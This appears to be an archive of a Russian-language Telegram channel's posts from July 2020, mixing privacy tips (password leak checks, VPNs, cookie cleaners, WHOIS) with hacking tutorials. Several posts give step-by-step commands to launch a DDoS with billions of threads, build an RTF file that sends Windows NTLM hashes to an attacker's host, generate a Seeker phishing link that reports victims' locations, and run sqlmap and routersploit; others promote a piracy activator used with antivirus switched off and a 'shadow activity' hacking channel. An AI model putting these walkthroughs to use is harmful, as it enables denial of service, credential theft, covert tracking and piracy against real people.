Size: a a a

2020 July 12
CODE RED
Расширения. Автоматически проверяем пароли на утечку по базам

PassProtect -  это расширение, которое сравнивает пользовательский пароль с крупной базой утечек Have I Been Pwned. В базе хранятся данные всех скомпрометированных крупных компаний и сервисов за последние семь лет.

Что важно, при проверке пользовательской почты и пароля по базе, расширение использует k-анонимность. Таким образом, информация не передается ни на сервера компании, ни на сайт Have I Been Pwned. При наличии слитого пароля в базе, на экране появляется уведомление, предлагающее варианты усиления пароля и защиты от утечек.

Данное расширение позволяет «с ходу» понимать, безопасны ли используемые вами пароли, или они уже находиться в базе злоумышленников. Проверка пароля происходит в реальном времени, автоматически. Вам не придется терять время на проверку вручную. Согласитесь, удобно.

📌https://www.passprotect.io/

#расширения #безопасность #приватность
источник
2020 July 13
CODE RED
Как создать тысячи Gmail почт за секунды, имея один аккаунт

Возможно, некоторые из вас уже слышали о фиче Gmail с точками. Если поставить точку в любом месте адреса Gmail до знака @, то новый адрес будет являться уникальным и действующим. При этом все письма будут приходить на первоначальный адрес без точек. Для примера:

Допустим, у нас есть почта coderedcom@gmail.com, но для гугла code.redcom@gmail.com, codered.com@gmail.com и code.red.com@gmail.com будет одним ящиком и если на любой из них слать письма, то попадут они в одну почту. Согласитесь, удобно, когда при повторных регистрациях на сайте не нужно создавать новый аккаунт.

Ну а если есть необходимость в создании сотен и тысяч таких почт, то стоит воспользоваться ресурсом thebot.net. Нужно ишь помнить, что чем больше символов в вашем email, тем больше можно сгенерировать почт.

📌 https://thebot.net/api/gmail/

#хитрости
источник
2020 July 14
CODE RED
Активатор Windows и Office

Если вы испытываете трудности с лицензией или поиском ключа (либо его вообще нет), стоит воспользоваться «Re-Loader Activator». Ее функционал заключается в автоматической активации операционной системы Windows и офисного пакета приложений Microsoft Office.

Re-Loader способен активировать все версии Windows, а что касается Microsoft Office, то работает с такими версиями, как 2010/2013/2016.

Настройка

1. Отключаем антивирус на короткий промежуток времени (в том числе и встроенный защитник)
2. Запускаем Re-Loader Activator и нажимаем кнопку «Принять».
3. Нажимаем на значок программы или системы, которую необходимо активировать.
4. Ждем несколько секунд и радуемся активации.

Принцип активации построен на автоматической подборке лучшего метода взлома под определенную версию Windows или Microsoft Office.

📌 https://windows10activation.ru/activator/13-re-loader-activator.html

#windows
источник
2020 July 15
CODE RED
Клонируем приложения на Аndroid

Представьте ситуацию, когда вам потребовалось иметь «левый» WhatsApp, или же необходим второй ТГ. Для создания копий приложений причин может быть множество. Ну а поможет в этом программа App Cloner.

App Cloner позволяет менять цифровую подпись приложений, благодаря чему вы можете установить копии любой игры или программы. Клонированные приложения устанавливаются параллельно и работают независимо от своих оригинальных версий.

Приложение базовой версии распространяется бесплатно, но, к сожалению, в нем доступен лишь стандартный функционал, который ограничивается одним приложением-клоном и коротким списком возможных программ для клонирования.

Однако в премиум версии (ссылочку на которую я оставил) будет доступен более обширный функционал, включающий возможность создания более двух клонов приложения, смену значков приложений, поддержку многооконного запуска приложений, возможность смены Android ID, и много чего еще.

Кстати, программа позволяет прятать IMEI и MAC-адрес Wi-Fi и подменять местоположения. Вообщем, полезная утилита.

📌 https://4pda.ru/forum/index.php?showtopic=728647

#приложения #android
источник
2020 July 16
CODE RED
Самая масштабная атака в истории Twitter: взломаны аккаунты звезд, компаний и криптовалютных бирж

Минувшая ночь была трудной для компании Twitter: массовой компрометации подверглось множество аккаунтов публичных людей, компаний, криптовалютных бирж и так далее.

Так, среди пострадавших были: Билл Гейтс, Илон Маск, Джефф Безос, Джо Байден, Барак Обама, Уоррен Баффет, Канье Уэст, Ким Кардашян, компании Apple и Uber, крупнейшие криптовалютные биржи CoinDesk, Binance и Gemini, а также многие, многие другие. Для большинства этих учетных записей была включена двухфакторная аутентификация, которая не остановила хакеров.

Полученным доступом к топовым аккаунтам неизвестные злоумышленники воспользовались весьма странным образом: объявили аттракцион неслыханной щедрости и устроили фальшивую раздачу биткоинов. Сообщения хакеров сулили пользователям огромные прибыли (если те сначала отправят на указанный немного биткоинов).

Так как для всех взломанных аккаунтов использовались одинаковые сообщения и один и тот же биткоин-кошелек, можно увидеть, что по состоянию на 6:30 по московскому времени мошенники «заработали» примерно 13 BTC, то есть около 120 000 долларов.

Заявление Twitter

Глава Twitter Джек Дорси сообщает, что это крайне тяжелый день для компании и обещает, что расследование произошедшего будет максимально прозрачным.

В настоящий момент предварительные результаты расследования таковы. Twitter официально сообщает, что в корне случившегося лежит скоординированная атака на сотрудников компании с применением социальной инженерии. В результате злоумышленники смогли получить доступ к неназванным внутренним системам и инструментам, чем они и воспользовались, захватив контроль над множеством популярных аккаунтов.

#хакеры
источник
2020 July 17
CODE RED
​​Устраиваем DDoS атаку на сайт со смартфона

DDoS - это атака на сайт с целью выведения его из строя при помощи значительного количества обманных запросов. Серверам приходится обрабатывать превышенный объем запросов, с чем они, как правило, не справляются.

Недавно мы уже разобрались с принципом подобной атаки на Wi-Fi, ну а сегодня жертвой выступит сайт.

❗️Давайте сразу внесем ясность. Данную атаку следует проводить только на свои ресурсы с целью выяснить, как поведет себя сайт и его защита!

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️pkg update
▫️pkg install git python
▫️cd
▫️git clone https://github.com/Andrey-oss/ddoser
▫️cd ddoser
▫️pip3 install requests termcolor colorama
▫️python3 ddos.py

Использование

Далее просто пишем адрес сайта. В строчке "threads" вводим 9999999999999. Готово!

#хакинг #DDoS
источник
2020 July 19
CODE RED
Создаем надежный пароль

Ненадежный пароль может легко перечеркнуть все ваши дальнейшие усилия по защите ваших конфиденциальных данных, потому этому стоит уделить особое внимание. Чтобы создать максимально сильный пароль, мы воспользуемся ресурсом Getpass.

Getpass - это необычный генератор паролей. Дело в том, что он производит генерацию на основе самых редких символов, которые встречаются на раскладке клавиатуры. Данный сайт делает уклон именно на сложность пароля, а не на его запоминаемость. Такой подход ресурса обрекает на провал любые попытки взломать вас атакой Brute-force.

📌https://getpass.xyz/

#безопасность
источник
2020 July 20
CODE RED
Стираем абсолютно все данные с ПК

Одна из основ приватности - умение стирать «следы». Не важно, решили ли вы продать старое устройство, или же вам «постучались в дверь», научиться этому однозначно стоит.

O&O SafeErase Professional - инструмент для полного удаления файлов с компьютера и очистки дисков от их остатков. Программа позволяет безвозвратно стирать ваши файлы и папки, удалять следы использования интернет браузера и операционной системы, а также очищать свободное дисковое пространство от ранее удалённых файлов.

С помощью O&O SafeErase вы сможете безвозвратно стереть все личные файлы и следы работы в системе, не переживая что их в будущем смогут восстановить.

Использование специальных алгоритмов и возможности использовать один из шести методов стирания данных, позволяет не только выполнить быстрое удаление информации, путём перезаписи данных нулями, но и осуществить полную очистку особо конфиденциальной информации с помощью 35 циклов стирания.

📌 Win64: Скачать
📌 Win32: Скачать

#windows #приватность
источник
2020 July 21
CODE RED
​​Выбираем лучший бесплатный VPN

Как известно, большинство VPN сервисов предоставляют бесплатный тариф ли же бесплатный пробный период, но не каждый из них может похвастаться отличной скоростью и безопасностью соединения.  

Более того, многие VPN-сервисы, особенно мобильных версий, переполнены рекламой, проблемами с утечкой DNS и запрашивают слишком много разрешений. В этом посте мы поговорим о двух кроссплатформенных VPN сервисах, которые доступны совершенно бесплатно.

ProtonVPN Free —  Швейцарский VPN, отличается тем, что бесплатно предлагает безлимитный доступ на одном устройстве. Бесплатные пользователи получают доступ к серверам в трёх странах: США, Нидерландах и Японии. Нет доступа к протоколам P2P, Tor, безопасной потоковой трансляции и серверам Secure Core. Всё это доступно платным подписчикам.

Сервис ведёт свои операции максимально прозрачно. Подробно описываются запросы от правоохранительных органов. Логи не ведутся, поэтому никаких ответов на эти запросы быть не может.

Windscribe Free — Канадский сервис, который оказался самым быстрым из протестированных и предлагает 10 Гб в месяц. Приложения доступны на всех операционных системах. Пользователи бесплатного сервиса получают доступ к серверам в 10 странах: США, Канада, Франция, Германия, Нидерланды, Норвегия, Румыния, Швейцария, Великобритания и Гонконг.

Имеется большой выбор функций безопасности, отсутствие логов действий пользователей и регулярные обновления отчёта о прозрачности. Поскольку логи не ведутся, никакой информации правоохранительные органы получить не могут.

#полезно #приватность
источник
2020 July 22
CODE RED
Тестируем роутер на уязвимости со смартфона

Читатели моего канала не понаслышке знают, что, установив пароль на роутер, вы защищаете свою сеть лишь от честных людей. Многие роутеры уже «из коробки» имеют ряд уязвимостей, которые можно отключить в настройках. Например, уязвимость удаленного доступа, стандартный пароль в локальной сети и т.д.

Чтобы проверить роутер на различные виды уязвимостей, можно воспользоваться утилитой routersploit на termux.

Настройка

Устанавливаем Termux и подключаемся к роутеру.

Прописываем команды в консоль:

▫️pkg upgrade
▫️pkg install git python
▫️git clone https://github.com/threat9/routersploit
▫️cd routersploit
▫️pip3 install -r requirements.txt
▫️python3 rsf.py

Использование

▫️use scanners/autopwn

Есть 2 вида шлюза. 192.168.0.1 и 192.168.1.1. Выбирайте ваш и пишите:

▫️set target 192.168.0.1
▫️run

Далее будет произведено сканирование на уязвимости. Если вы их обнаружите, то пишите название уязвимости в поисковике Google и ищите методы их устранения.

#безопасность
источник
2020 July 23
CODE RED
​​Где найти вирусы с исходным кодом

Отыскать сборник актуальных вирусов, а уж тем более с описанием и исходниками — задача не из легких. Но только не для подписчиков CODE RED!

Изначально проект TheZoo создан для того, чтобы сделать анализ вредоносных программ открытым и доступным для общественности. Авторы постоянно обновляют и дополняют свою базу новыми вирусами. Для скачивания и изучения предлагается как исполняемый файл, так и исходники.

Исходный код вирусов находятся в каталоге:

theZoo/malwares/Source/Original/

Исполняемые файлы вирусов находятся в каталоге:

theZoo/malwares/Binaries/

Для каждого вируса есть своя отдельная директория, в которой находятся 4 файла: само вредоносное ПО в зашифрованном виде, в ZIP архиве, SHA256 и MD5 — контрольные суммы архива для сравнения и пароль для зашифрованного архива.

Подробное описание и руководство, вы сможете найти в описании проекта на Githab.

📌https://github.com/ytisf/theZoo

❗️Напомню, использовать вирусы против других - незаконно и не рекомендуется!

#хакинг
источник
2020 July 24
CODE RED
​​Каждый 142 пароль - 123456. Как создавать безопасные пароли?

Эксперт в области Компьютерных Технологий - Ата Хаксил провел исследование на тему использования паролей. Под его анализ попало более 1 миллиарда слитых учетных данных!
Ата анализировал доступные в Сети БД — часть из них, например, лежала на GitHub и GitLab, другая часть распространялась через хакерские форумы и файлообменники.

Специалист проанализировал более миллиарда связок и выяснил, что только 168 919 919 паролей являются уникальными. А «123456» эксперт встретил целых 7 миллионов раз.
Кроме того, автор исследования установил среднюю длину паролей – 9,48 символов (часто рекомендуется использовать от 16 и до 24 символов).

Только 12% комбинаций при этом содержали специальные символы. 29% паролей состояли только из букв, 13% – только из цифр. Разумеется, в подборе таких паролей нет ничего сложного.

P.S. Ниже я приложил схему, наглядно демонстрирующую, каких еще ошибок стоит избегать при создании паролей.

#полезно #безопасность
источник
2020 July 25
CODE RED
​​Делаем SQL инъекцию с помощью телефона

SQL инъекция — это один из самых доступных способов взлома сайта. Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения Cookie) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это MySQL) что угодно. Данная атака позволяет находить базы данных пользователей различных сайтов, обходить авторизацию, тестировать ресурсы и многое другое.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️pkg upgrade
▫️pkg install python2 git
▫️git clone https://github.com/sqlmapproject/sqlmap.git
▫️cd sqlmap

Использование

▫️python2 sqlmap.py -u <url уязвимого веб-сайта>

Подробный список команд

📌 https://github.com/sqlmapproject/sqlmap/wiki/Usage

❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.

#хакинг
источник
2020 July 27
CODE RED
​​Как расшифровать короткую ссылку

Довольно часто бывают ситуации, когда ссылки на какой-нибудь сайт получаются очень уж длинными, и потому неудобными для того, чтобы делиться ими с кем-то. Для таких ситуаций и были созданы короткие ссылки.

Но, как и многое другое в этом мире, этот инструмент имеет и «темную сторону» сторону. Дело в том, что переходя по короткой ссылке, человек понятния не имеет, куда, собственно, он переходит. А увидит он это только после совершения самого перехода.

В итоге, кликая по короткой ссылке, можно запросто оказаться на каком-нибудь зловредном ресурсе, где от вирусов и прочей малвари не будет отбоя.

Чтобы избежать неприятных ситуаций, описанных выше, воспользуемся ресурсом, который дешифрует ссылки. Кстати, ресурс позволяет «за одно» проверить ссылку на вирусы и показывает цепочку перенаправлений.

👺А вот и небольшой тест работоспособности ресурса. Куда приведет эта ссылка? 👉 shorturl.at/yzGQR

📌 https://longurl.info/

#хитрости #безопасность
источник
2020 July 28
CODE RED
​​Скачал книгу? Твои пароли уже у хакеров

Возможность интегрировать в RTF файл тот же стиллер поставила под угрозу пользователей, качающих электронные книги в этом формате. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.

Утилита WordSteal может наглядно продемонстрировать работу уязвимости RTF. Она с легкостью вошьет стиллер в RTF файл с картинкой. Когда условная жертва откроет этот файл, хакер удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:

Настройка

Устанавливаем Kali Linux

Для начала установим репозиторий и обновим права доступа

git clone https://github.com/0x09AL/WordSteal.git
chmod +x main.py

Использование

Для создания RTF файла со стиллером нам понадобится только картинка.

python main.py <ip хоста> <название картинки> 1

После выполнения этой команды в директории появится RTF файл с полезной нагрузкой. Чтобы её испытать, нужно не закрывая окно терминала открыть данный файл на Windows. В терминал придут хеши паролей.

❗️Чтобы за «бесплатные» книги не пришлось дорого расплачиваться, скачивать их стоит из Архива хакера - @hackrhive

#хакинг #безопасность
источник
2020 July 29
CODE RED
​​Расширения. Автоматически «подтираем» Cookie

Большинство современных браузеров позволяет пользователям выбрать — принимать cookie или нет, но их отключение делает невозможной работу с некоторыми сайтами. Кроме того, по законам некоторых стран (например, по закону Евросоюза) ресурсы должны в обязательном порядке запрашивать согласие перед установкой cookie.

Но сайты все же умудряются собирать эти «лакомства». Дело в том, что Cookie легко перехватить и подменить, если пользователь использует нешифрованное соединение с сервером. В группе риска пользователи, выходящие в интернет при помощи публичных точек доступа Wi-Fi и не использующие при этом таких механизмов, как SSL и TLS.

Простой пример: пароли , которые вы ввели в браузер, хранятся в Cookie, и их можно легко "вытащить" с помощью обычного стиллера.

Чтобы избежать подобных неприятностей, стоит воспользоваться расширением Cookie AutoDelete. С его помощью можно полностью контролировать Cookie - от блокировок для отдельных ресурсов и до автоматического удаления.

📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка

#расширения #приватность #безопасность
источник
2020 July 30
CODE RED
​​Apple выпустили «хакерский» IPhone

На прошлой неделе компания Apple объявила об официальном запуске программы Security Research Device (SRD), которую анонсировали еще в прошлом году. В рамках этой инициативы избранным исследователям предоставят специальные версии iPhone.

У таких устройств отключено большинство функций безопасности, и инженеры Apple используют эти девайсы для поиска проблем.

Кстати, ранее такие девайсы нередко попадали на черный рынок, где они продавались за немалые деньги, и порой оказывались в руках брокеров уязвимостей или продавцов 0-day.

Исследователям предлагается подать заявку на участие в SRD, причем для этого необязательно иметь некое профильное образование и кучу дипломов. Достаточно обладать подтвержденным опытом в сфере ИБ-исследований, причем не только iPhone, но и других устройств и ПО, включая Android, Windows и Linux.
источник
CODE RED
Интересуешься взломом, хакингом и другой теневой деятельностью?

Тогда однозначно рекомендую тебе читать FCS!

Только авторские статьи с закрытых форумов, отдельное комьюнити для общения и много разных плюшек;

Действуй 👉 https://t.me/joinchat/AAAAAE3S7jMotXfNnS61Lg
источник
2020 July 31
CODE RED
​​Узнаем местоположение по ссылке

При переходе на тот или иной сайт у вас может запрашиваться дополнительная информация в виде камеры, местоположения и т.д. Благодаря этой фиче можно создавать различные фишинг страницы для сбора информации. Утилита Seeker специализируется именно на получении местоположения жертвы.

Он работает на ngrok, генерируя уникальную фишинг ссылку. Перейдя по ней, первым делом появится окно с подтверждением местоположения. Даже если жертва откажется передавать информацию, атакующий все равно получит данные об устройстве. В ином случае местоположение пользователя будет определено с точностью до 30 метров и отправлено на удаленный сервер.

Установка

Устанавливаем Kali Linux

Скачиваем Seeker и ставим права на установщик

git clone https://github.com/thewhiteh4t/seeker.git

cd seeker/

chmod 777 install.sh

Запускаем установщик командой

./install.sh

Использование

Seeker максимально автоматизирован, поэтому для запуска хватит одной команды

python seeker.py

После окончания запуска в терминале появится фишинговая ссылка.

#хакинг
источник
2020 August 01
CODE RED
​​Как узнать кто владелец сайта

Самый простой способ определить владельца домена – использовать WHOIS – сетевой протокол, который открывает доступ к публичным базам регистраторов IP и доменных имен.  

Возможно это благодаря тому, что обязательным правилом регистрации домена является указание своей контактной информации, которая хранится у регистраторов доменных имен, а также содержится в whois-базах.

Этих баз с информацией о доменах множество и они обновляются по мере обновления информации о домене.

Наиболее популярными являются:

📌https://www.whois.net/
📌https://www.whois.com/whois/
📌https://whois.icann.org/ru
📌https://who.is/

Какой базой пользоваться – решать вам, но рекомендую проверять домен в нескольких базах сразу, т.к. данные этих ресурсов обновляются с различной частотой.

#хитрости
источник